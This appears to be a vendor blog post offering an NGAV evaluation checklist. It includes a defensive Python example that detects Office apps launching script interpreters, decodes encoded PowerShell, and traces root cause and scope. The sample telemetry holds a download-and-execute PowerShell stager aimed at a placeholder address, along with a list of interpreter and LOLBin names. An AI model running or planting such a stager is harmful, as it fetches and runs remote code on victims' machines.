In recent weeks, we’ve written on some pretty timely and interesting topics. We first discussed the ineffectiveness of traditional antivirus, which catches less than half of noteworthy malicious events. We then introduced, defined, and discussed Next-Generation Antivirus (NGAV), the natural (and much needed) evolution of AV that protects computers from the full spectrum of modern cyber attacks.
Today (and next week) we’ll take a bit of a different approach. We put you, the reader, in the driver’s seat when it comes to re-thinking your endpoint defenses and provide you with a checklist of items to consider as you make your decision to transition to NGAV. After all, once you have been informed, you still need to determine the best path forward for your security program.
Traditional antivirus was designed and built before the explosion of cybercrime and before attacker tools and techniques began changing at today’s pace. Modern attacks often leverage built-in tools and scripts, a far cry from the days when an attack almost always meant a malicious binary. Furthermore, it’s not just about the kinds of attacks; it’s about being able to protect yourself quickly rather than waiting for your vendor to push out signatures and hoping your endpoints receive the update before the malicious email lands in your employees’ inboxes.
To reduce your environment’s cyber risk, you need an endpoint-security approach that goes beyond malware, incorporating next-generation features that target the tactics, techniques, and procedures frequently used by both mass scale opportunistic attackers and advanced threats specifically targeting your organization.
This checklist will help you assess the capabilities of your current antivirus solution and will provide guidance for migrating to a more mature posture. You may have unique requirements or constraints (everyone does), but what we list here will ease your shift to next-generation antivirus.
Checklist Category #1: Protection from the Full Range of Modern Attacks
Modern attackers generate new malware faster than traditional AV can add signatures for it, and they are mastering techniques that don’t require malware at all. Your endpoint security solution should protect against the full range of attacks, not just threats that involve running a malicious executable. Beyond blocking the initial execution, there should be strong protection against post-exploitation techniques that adversaries find particularly useful, such as thread injection and RAM (memory) scraping.
In evaluating an NGAV solution, make sure it protects against:
- Known malware and variants including malware-based ransomware
- Obfuscated, evasive, or previously unknown malware
- Compromised (exploited) legitimate software (Flash, Silverlight, etc.)
- Malicious scripts and interpreted code such as PowerShell, Visual Basic (VBA macros and VBScript), Perl, Python, and Java
- Memory-resident and fileless attacks
- Document-based attacks (PDFs and macros)
- Remote login attacks and the malicious use of legitimate, already-installed tools (living off the land)
Checklist Category #2: Extensible Cloud Security Intelligence and Analytics
As attackers evolve and adapt their tactics and techniques, you need to employ new analytic capabilities and attack intelligence to properly defend yourself – without having to redeploy your security infrastructure.
Your NGAV should feature:
- A cloud backend for high-powered analysis and the application of vendor intelligence
- Multiple inspection engines that focus on reputation, behavior, and event relationships
- Configurable detection sensitivities to prioritize important events and reduce unnecessary alerting
- Open and extensible threat feeds for third-party attack intelligence and for leveraging security investments you’ve already made
- Community-based intelligence sharing and the network effect of benefiting from attacks other users witness
Checklist Category #3: Visibility and Context into Attack and Detection Events
After an attack attempt, you need to understand what happened so you can contain and control the situation, prevent further damage, and improve your overall security posture. The right context helps you do all that quickly and easily. If each attack doesn’t leave you better defended than before, we recommend reconsidering your approach.
Your NGAV solution should provide:
- Insight into how the threat started, even before it was detected (root cause)
- Visibility into where else in your organization this threat may exist (scope)
- Guidance on what’s needed to recover and how to close gaps (education and maturity)
- Data sharing within your ecosystem (SIEM, etc.) (integration and automation)
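The Category #1 items on script-based, document-based and living-off-the-land attacks and the Category #3 items on root cause and scope describe capabilities without showing what the underlying logic looks like. The following is an added example written for this post, not code from the original article or from any NGAV product. It runs a behavioral rule over constructed process-creation telemetry (a document handler spawning a script interpreter, which no file signature would catch), decodes the PowerShell -EncodedCommand argument to reveal intent, walks the parent chain back to the originating document (root cause), and lists the other hosts where the same decoded payload ran (scope). The event schema, host names, sample command lines and the TEST-NET download address are all constructed assumptions; real EDR/NGAV feeds use different field names.

```python
"""Behavioral detection plus root-cause and scope walk over process telemetry.

Added example, not code from the original post or any NGAV product. The event
schema (host, pid, ppid, image, cmdline) and the sample telemetry below are
constructed assumptions.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    pid: int
    ppid: int
    image: str      # executable file name, lower-case
    cmdline: str


@dataclass(frozen=True)
class Alert:
    host: str
    pid: int
    rule: str
    payload: str | None   # decoded -EncodedCommand script, when present


# Behavioral rule: a document handler spawning a script interpreter or LOLBin.
# No hash or signature is involved, which is exactly why signature AV misses it.
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}

# Constructed payload (TEST-NET address, not a real host): the usual
# download-and-execute one-liner, Base64(UTF-16LE) as PowerShell expects.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode("ascii")

# Constructed telemetry: a macro-launched chain on ws01, the same lure opened
# on ws02 with a differently spelled switch, and a legitimate admin script on ws03.
EVENTS = [
    ProcEvent("ws01", 100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent("ws01", 200, 100, "outlook.exe", "outlook.exe"),
    ProcEvent("ws01", 300, 200, "winword.exe", 'winword.exe /n "C:\\Users\\a\\Downloads\\invoice.docm"'),
    ProcEvent("ws01", 400, 300, "powershell.exe", f"powershell.exe -nop -w hidden -enc {ENCODED}"),
    ProcEvent("ws02", 100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent("ws02", 310, 100, "winword.exe", 'winword.exe /n "C:\\Users\\b\\Desktop\\invoice.docm"'),
    ProcEvent("ws02", 410, 310, "powershell.exe", f"powershell.exe -NoProfile -EncodedCommand {ENCODED}"),
    ProcEvent("ws03", 100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent("ws03", 700, 100, "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"),
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" and keep it only if it is a prefix of the full switch name.
ENC_ARG = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
DOC_ARG = re.compile(r'"([^"]+\.(?:doc[mx]?|dotm|xls[mx]?|ppt[mx]?|pdf))"', re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand script, or None if the switch is absent/invalid."""
    for m in ENC_ARG.finditer(cmdline):
        if "encodedcommand".startswith(m.group(1).lower()):
            try:
                return base64.b64decode(m.group(2), validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def _by_key(events: list[ProcEvent]) -> dict[tuple[str, int], ProcEvent]:
    return {(e.host, e.pid): e for e in events}


def detect(events: list[ProcEvent]) -> list[Alert]:
    """Flag script interpreters whose parent process is a document handler."""
    procs = _by_key(events)
    alerts = []
    for e in events:
        parent = procs.get((e.host, e.ppid))
        if parent is not None and parent.image in DOCUMENT_APPS and e.image in INTERPRETERS:
            alerts.append(Alert(e.host, e.pid, f"{parent.image} -> {e.image}",
                                decode_encoded_command(e.cmdline)))
    return alerts


def ancestry(events: list[ProcEvent], host: str, pid: int) -> list[ProcEvent]:
    """Walk ppid links back to the root: the chain an analyst reads for root cause."""
    procs, chain, seen = _by_key(events), [], set()
    while (host, pid) in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[(host, pid)])
        pid = procs[(host, pid)].ppid
    return chain[::-1]   # oldest ancestor first


def root_document(chain: list[ProcEvent]) -> str | None:
    """The document that started the chain, taken from the first document app's command line."""
    for e in chain:
        if e.image in DOCUMENT_APPS and (m := DOC_ARG.search(e.cmdline)):
            return m.group(1)
    return None


def scope(events: list[ProcEvent], alert: Alert) -> set[str]:
    """Hosts where the same decoded payload ran, however the switch or encoding was spelled."""
    if alert.payload is None:
        return {alert.host}
    return {e.host for e in events
            if e.image in INTERPRETERS and decode_encoded_command(e.cmdline) == alert.payload}


if __name__ == "__main__":
    for a in detect(EVENTS):
        chain = ancestry(EVENTS, a.host, a.pid)
        print(a.host, a.rule, "| root:", root_document(chain), "| scope:", sorted(scope(EVENTS, a)))
        print("    payload:", a.payload)
```

Two points worth noticing: the rule keys on process lineage and the decoded script, so the benign `-ExecutionPolicy Bypass -File backup.ps1` run on ws03 is not flagged, and scoping compares decoded payloads rather than raw command lines, so the `-enc` and `-EncodedCommand` spellings on ws01 and ws02 still collapse to the same incident. Feeding the alerts, chain and host list into a SIEM is the integration item in the list above.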
Tune into next week’s blog to read about checklist categories four through six, or download the full “It’s Time to Replace Antivirus Checklist” here.
The Antivirus Replacement Checklist provides:
- A list of features you need to prioritize for possible NGAV solutions
- Guidance on how to find a solution that will stop more than just malware
- Criteria you can use to make sure a solution will be the best fit for your organization